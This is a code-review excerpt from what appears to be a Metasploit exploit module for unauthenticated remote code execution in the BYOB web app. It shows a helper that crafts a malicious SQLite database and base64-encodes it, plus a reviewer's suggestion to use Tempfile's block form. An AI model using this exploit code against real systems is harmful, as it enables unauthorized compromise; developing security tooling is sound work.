modules/exploits/unix/webapp/byob_unauth_rce.rb

```diff
@@ -0,0 +1,367 @@
+  end
+
+  def generate_malicious_db(_username, _password)
+    mem_db = SQLite3::Database.new(':memory:')
+
+    mem_db.execute <<-SQL
+            CREATE TABLE user (
+            id INTEGER NOT NULL,
+            username VARCHAR(32) NOT NULL,
+            password VARCHAR(60) NOT NULL,
+            joined DATETIME NOT NULL,
+            bots INTEGER,
+            PRIMARY KEY (id),
+            UNIQUE (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE session (
+            id INTEGER NOT NULL,
+            uid VARCHAR(32) NOT NULL,
+            online BOOLEAN NOT NULL,
+            joined DATETIME NOT NULL,
+            last_online DATETIME NOT NULL,
+            public_ip VARCHAR(42),
+            local_ip VARCHAR(42),
+            mac_address VARCHAR(17),
+            username VARCHAR(32),
+            administrator BOOLEAN,
+            platform VARCHAR(5),
+            device VARCHAR(32),
+            architecture VARCHAR(2),
+            latitude FLOAT,
+            longitude FLOAT,
+            new BOOLEAN NOT NULL,
+            owner VARCHAR(120) NOT NULL,
+            PRIMARY KEY (uid),
+            UNIQUE (uid),
+            FOREIGN KEY(owner) REFERENCES user (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE payload (
+            id INTEGER NOT NULL,
+            filename VARCHAR(34) NOT NULL,
+            operating_system VARCHAR(3),
+            architecture VARCHAR(14),
+            created DATETIME NOT NULL,
+            owner VARCHAR(120) NOT NULL,
+            PRIMARY KEY (id),
+            UNIQUE (filename),
+            FOREIGN KEY(owner) REFERENCES user (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE exfiltrated_file (
+            id INTEGER NOT NULL,
+            filename VARCHAR(34) NOT NULL,
+            session VARCHAR(15) NOT NULL,
+            module VARCHAR(15) NOT NULL,
+            created DATETIME NOT NULL,
+            owner VARCHAR(120) NOT NULL,
+            PRIMARY KEY (id),
+            UNIQUE (filename),
+            FOREIGN KEY(owner) REFERENCES user (username)
+            );
+    SQL
+
+    mem_db.execute <<-SQL
+            CREATE TABLE task (
+            id INTEGER NOT NULL,
+            uid VARCHAR(32) NOT NULL,
+            task TEXT,
+            result TEXT,
+            issued DATETIME NOT NULL,
+            completed DATETIME,
+            session VARCHAR(32) NOT NULL,
+            PRIMARY KEY (id),
+            UNIQUE (uid),
+            FOREIGN KEY(session) REFERENCES session (uid)
+            );
+    SQL
+
+    file = Tempfile.new('database.db')
+    src_db = SQLite3::Database.new(file.path)
+    backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')
+    backup.step(-1)
+    backup.finish
+
+    binary_data = File.binread(file.path)
+
+    base64_data = Rex::Text.encode_base64(binary_data)
+
+    file.close
+    file.unlink
```

Comment:
Using the block form is fewer lines of code and has the added benefits of deleting the file from disk even if one of the lines raises an exception for some reason.

```suggestion
    base64_data = Tempfile.open('database.db') do |file|
      src_db = SQLite3::Database.new(file.path)
      backup = SQLite3::Backup.new(src_db, 'main', mem_db, 'main')
      backup.step(-1)
      backup.finish
  
      binary_data = File.binread(file.path)

      Rex::Text.encode_base64(binary_data)
    end
```